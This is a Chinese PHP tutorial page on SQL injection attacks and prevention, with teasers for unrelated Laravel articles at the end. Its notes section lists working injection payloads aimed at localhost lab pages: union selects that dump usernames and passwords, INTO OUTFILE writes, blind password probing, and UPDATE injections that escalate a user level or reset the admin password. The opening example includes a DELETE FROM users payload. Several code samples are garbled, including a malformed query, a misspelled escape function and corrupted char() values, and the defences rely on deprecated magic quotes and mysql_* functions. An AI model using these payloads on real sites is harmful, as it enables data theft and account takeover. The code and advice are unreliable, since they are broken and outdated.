php sql注入攻擊與防範注意事項-php教程-PHP中文網

首頁

後端開發

php教程

php sql注入攻擊與防範注意事項

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 25, 2016 am 08:52 AM

// supposed input
$name = "ilia'; DELETE FROM users;";
mysql_query("SELECT * FROM users;";

mysql_query("SELECT * FROM users) WHERE nameus' $name}'");

複製程式碼

很明顯最後資料庫執行的指令是：

SELECT * FROM users WHERE name=ilia; DELETE FROM users

複製代碼

這就為資料庫帶來了災難性的後果–所有記錄都被刪除了。

不過如果使用的資料庫是MySQL，那麼還好，mysql_query()函數不允許直接執行這樣的操作（不能單行進行多個語句操作），所以你可以放心。如果使用的資料庫是SQLite或PostgreSQL，支援這樣的語句，那麼就將面臨滅頂之災了。

上面提到，SQL注入主要是提交不安全的資料給資料庫來達到攻擊目的。為了防止SQL注入攻擊，PHP自帶一個功能可以對輸入的字串進行處理，可以在較底層對輸入進行安全上的初步處理，也即Magic Quotes。 (php.ini magic_quotes_gpc)。如果magic_quotes_gpc選項啟用，那麼輸入的字串中的單引號，雙引號和其它一些字元前將會被自動加上反斜線。

但Magic Quotes並不是一個很通用的解決方案，沒能屏蔽所有有潛在危險的字符，並且在許多伺服器上Magic Quotes並沒有被啟用。所以，我們還需要使用其它多種方法來防止SQL注入。

許多資料庫本身就提供這種輸入資料處理功能。例如PHP的MySQL操作函數中有一個叫做mysql_real_escape_string()的函數，可將特殊字元和可能造成資料庫操作出錯的字元轉義。這段程式碼：

//如果Magic Quotes功用啟用
if (get_magic_quotes_gpc()) {
name);
}else{
$name = mysql_real_escape_string($name);
}
mysql_query("SELECT * FROM users WHERE name='{$name} '");

複製程式碼

注意，在使用資料庫所帶的功能之前要判斷Magic Quotes是否打開，就像上例一樣，否則兩次重複處理就會出錯。如果MQ已啟用，要把加上的去掉才得到真實資料。

除了對以上字串形式的資料進行預處理之外，儲存Binary資料到資料庫時，也要注意進行預處理。否則資料可能與資料庫本身的儲存格式相衝突，造成資料庫崩潰，資料記錄遺失，甚至遺失整個庫的資料。有些資料庫如 PostgreSQL，提供一個專門用來編碼二進位資料的函數pg_escape_bytea()，它可以對資料進行類似Base64那樣的編碼。

例如：

// for plain-text data use:
pg_escape_string($regular_strings);
pg_escape_string($regular_strings);
// for binary data use:
pg_escape_bytea($binary_data);

複製程式碼

另一種情況下，也要採用這樣的機制。那就是資料庫系統本身不支援的多字節語言如中文，日文等。其中有些的ASCII範圍和二進位資料的範圍重疊。

這裡推薦兩篇關於php sql注入防範的文章，一是360安全提供的，另一個筆者收集的php防sql注入的程式碼，很強大很好用。

php防SQL注入程式碼(360提供)
php防止sql注入漏洞過濾函數的程式碼

不過對資料進行編碼將有可能導致像LIKE abc%　這樣的查詢語句失效。

php sql注入實作(測試程式碼安全不錯)

SQL注入的重點就是建構SQL語句，只有彈性的運用SQL 語句才能建構出牛比的注入字串。學完之後寫了點筆記，已備隨時使用。希望你在看下面內容時先了解SQL的基本原理。筆記中的程式碼來自網路。 ===基礎部分=== 本表查詢： http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6 http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m

Union聯合語句： http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/* http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*

匯出檔案： http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt http://127.0.0.1/injection/user.php?username=' 或 1=1 into outfile 'c:/file.txt http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

INSERT語句： INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1'); 建構homepage值為：http://jbxue.com', '3')# SQL語句變成：INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://jbxue.com', '3')#' , '1');

UPDATE語句：我喜歡這樣東西先理解這句SQL

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

複製程式碼

如果此SQL被修改成以下形式，就實現了注入 1：修改homepage值為 http://jbxue.com', userlevel='3 之後SQL語句變為

UPDATE user SET password='mypass', homepage='http://jbxue.com', userlevel='3' WHERE id='$id '

複製代碼

userlevel為使用者級別 2:修改password值為

mypass)' WHERE username='admin'#

複製代碼

之後SQL語句變為

UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$ id'

複製程式碼

3：修改id值為 ' OR username='admin' 之後SQL語句變為

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

複製程式碼

===高階部分=== 常用的MySQL內建函數 DATABASE() USER() SYSTEM_USER() SESSION_USER() CURRENT_USER() database() version() SUBSTRING() MID() char() load_file() …… 函數應用 UPDATE article SET title=DATABASE() WHERE id=1 http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()

SELECT * FROM user WHERE username=char(97,110,103,101,108) # char(97,110,1037,10,1037,10,1037,110,1037,110,1033)> 🎜 >

複製程式碼

http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password ,1)>char(100) http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111

確定資料結構的字段數量及類型 http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)

猜資料表名 http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members

跨表格查詢得到使用者名稱和密碼 http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1 from ymdown_user where id=1

其他 #驗證第一位密碼 http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49

===注入防範=== 伺服器方面 magic_quotes_gpc設定為On display_errors設定為Off 編碼方面

$keywords = addslashes($keywords);
$keywords = str_replace("_","_",$keywords);
$keywords = str_replace("%","%",$keywords);

複製程式碼

數值型別使用intval()抓換字串類型 SQL語句參數中要新增單引號下面程式碼，用於防治注入

if (get_magic_quotes_gpc()) {
//....
}else{
$str = mysql_real_estring($str. );
$keywords = str_replace("_","_",$keywords);
$keywords = str_replace("%","%",$keywords);
}

複製程式碼

有用的函數 stripslashes() get_magic_quotes_gpc() mysql_real_escape_string() strip_tags() array_map() addslashes()

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

11個最佳PHP URL縮短腳本（免費和高級）Mar 03, 2025 am 10:49 AM

長URL（通常用關鍵字和跟踪參數都混亂）可以阻止訪問者。 URL縮短腳本提供了解決方案，創建了簡潔的鏈接，非常適合社交媒體和其他平台。這些腳本對於單個網站很有價值

Instagram API簡介Mar 02, 2025 am 09:32 AM

在Facebook在2012年通過Facebook備受矚目的收購之後，Instagram採用了兩套API供第三方使用。這些是Instagram Graph API和Instagram Basic Display API。作為開發人員建立一個需要信息的應用程序

在Laravel中使用Flash會話數據Mar 12, 2025 pm 05:08 PM

Laravel使用其直觀的閃存方法簡化了處理臨時會話數據。這非常適合在您的應用程序中顯示簡短的消息，警報或通知。默認情況下，數據僅針對後續請求： $請求 -

構建具有Laravel後端的React應用程序：第2部分，ReactMar 04, 2025 am 09:33 AM

這是有關用Laravel後端構建React應用程序的系列的第二個也是最後一部分。在該系列的第一部分中，我們使用Laravel為基本的產品上市應用程序創建了一個RESTFUL API。在本教程中，我們將成為開發人員

簡化的HTTP響應在Laravel測試中模擬了Mar 12, 2025 pm 05:09 PM

Laravel 提供简洁的 HTTP 响应模拟语法，简化了 HTTP 交互测试。这种方法显著减少了代码冗余，同时使您的测试模拟更直观。基本实现提供了多种响应类型快捷方式： use Illuminate\Support\Facades\Http; Http::fake([ 'google.com' => 'Hello World', 'github.com' => ['foo' => 'bar'], 'forge.laravel.com' =>